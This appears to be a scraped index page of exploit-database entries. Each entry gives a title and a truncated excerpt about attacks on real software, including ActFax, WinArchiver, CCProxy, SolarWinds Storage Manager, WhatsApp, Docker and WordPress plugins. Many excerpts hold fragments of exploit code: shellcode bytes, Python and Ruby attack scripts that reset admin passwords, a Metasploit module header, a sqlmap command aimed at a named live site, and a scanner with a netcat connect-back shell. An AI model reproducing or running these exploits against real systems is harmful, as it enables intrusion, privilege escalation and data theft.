ActFax-4.31---Local-System

Title: ActFax 4.31 Local Privilege Escalation Exploit Author: Craig Freyman @cd1zz Discovered: July 10, 2012 Vendor Notified: June 12, 2012 Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html sc = "\x89\xe5\xdb\xce\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49"...

WinArchiver-3.2-SEH

Exploit Title: Winarchiver V 3.2 SEH Overflow Date: April 24, 2013 Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon Organization: RealPentesting Vendor Homepage: http://winarchiver.com Software Link: http://www.winarchiver.com/WinArchiver3.exe zipheader =...

CCProxy-7.3-Integer-Overflow

Exploit Title: CCProxy v7.3 Integer Overflow Exploit Date: 2013/03/22 Author: Mr.XHat E-Mail: Mr.XHat GMail.com Vendor Homepage: http://www.youngzsoft.net/ Software Link: http://user.youngzsoft.com/ccproxy/update/ccproxysetup.exe Version: Prior To 7.3 hdr = "System" hdr += "\x0d\x0a" hdr +=...

VCDGear-3.50---(.cue)

Description: VCDGEAR 3.50 is prone to a stack-based buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will...

MP3Info-0.8.5a---SEH

The process memory region starts with a null byte but exploitation is still possible because of the little endian architecture provided that the return address gets placed at the end of the buffer, this however confines us in the tiny 4-byte area after pop/pop/retn Using a couple of trampolines I...

Windows-XP-SP3---BthPan.sys

Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation Advisory ID: KL-001-2014-002 Publication Date: 2014-07-18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt from ctypes import from struct import pack from os import getpid,system from sys...

Solarwinds-Storage-Manager-5.1.0

Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit Date: May 2nd 2012 Author: muts Version: SolarWinds Storage Manager 5.1.0 Tested on: Windows 2003 Archive Url : http://www.offensive-security.com/0day/solarshell.txt import urllib, urllib2, cookielib import sys...

Novell-File-Reporter

Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability 0day CVE-2012-4959 @abysssec well just one more of our 0day got published after 2 year here is info : https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959 and here...

OpenCompact-Ftp-Server-1.2

Abusing authentication bypass in combination with a directory traversal to grab the sam file for offline cracking By Wireghoul - http://www.justanotherhacker.com Based on Serge Gorbunov's auth bypass http://www.exploit-db.com/exploits/13932/ Software Link: http://sourceforge.net/projects/open-ftp...

Apache-+-PHP-5.x

quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE : - for connect back shell start netcat/nc and bind port on given host:port - is ip-range scanner not is multithreaded, but iz multithreaded iz in random scanner and is scanner from file greets to MustLive - no ssl support - more php paths can be...

WhatsApp Remote Crash On Android

!/usr/bin/python -- coding: utf-8 - Title: WhatsApp Remote Reboot/Crash App Android Product: WhatsApp Vendor Homepage: http://www.whatsapp.com Vulnerable Versions: 2.11.476 Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4 Date: 26/12/2014 RemoteExecution - www.remoteexecution.net Author...

CVE-2004-2771

The expand function in fio.c in Heirloom mailx 12.5 and earlier and BSD mailx 8.1.2 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in an email address...

Shopex开放平台某处SQL注入

简要描述： Shopexopen平台Sql注入 详细说明： open平台： sqlmap -u 'http://open.shopex.cn/docs/apisearch/?methodtypeid=22&docskeyword=&platformid=0' 漏洞证明： 截图：...

CVE-2014-9357

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted 1 image or 2 build in a Dockerfile in an LZMA .xz archive, related to the chroot for archive extraction...

WordPress Plugin Symposium 14.10 - SQL Injection

WordPress Plugin Symposium 14.10 - SQL Injection Exploit Title: WP Symposium 14.10 SQL Injection Date: 22-10-2014 Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek Software Link: https://downloads.wordpress.org/plugin/wp-symposium.14.10.zip Category: webap...

Device42 Traceroute Command Injection

This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'WAN Emulator v2.3 Command Execution', 'Description' = %q , 'License' = MSFLICENSE, 'Privileged' = true, 'Platform' = 'unix', 'Arch' =...

Arris VAP2500 - Authentication Bypass

Arris VAP2500 - Authentication Bypass !/usr/bin/env ruby require 'net/http' require 'digest/md5' if !ARGV0 puts "Usage: $0 " exit0 end host = ARGV0 newpass = "h4x0r3d!" http = Net::HTTP.newhost.start users = nil users = http.requestget"/admin.conf".body.split"\n".map! |user| user.sub/^.?,.$/,"\1"...

Arris VAP2500 - Authentication Bypass

!/usr/bin/env ruby require 'net/http' require 'digest/md5' if !ARGV0 puts "Usage: $0 " exit0 end host = ARGV0 newpass = "h4x0r3d!" http = Net::HTTP.newhost.start users = nil users = http.requestget"/admin.conf".body.split"\n".map! |user| user.sub/^.?,.$/,"\1" if users puts " found user accounts:...

Atrax Botnet Shell Upload Vulnerability

Exploit for php platform in category web applications import random import string import base64 import urllib import urllib2 payload = '' url = 'http://localhost/atrax/' BOTMODEINSERT = 'b' BOT MODE BOTMODERUNPLUGIN = 'e' GETPARAMMODE = 'a' GET PARAM POSTPARAMGUID = 'h' POST PARAM POSTPARAMIP = '...

D-LINK Remote Command Execution

Unauthenticated Remote Command Execution Vulnerability Type: Remote Command Execution For the exploit source code contact DSquare Security sales team...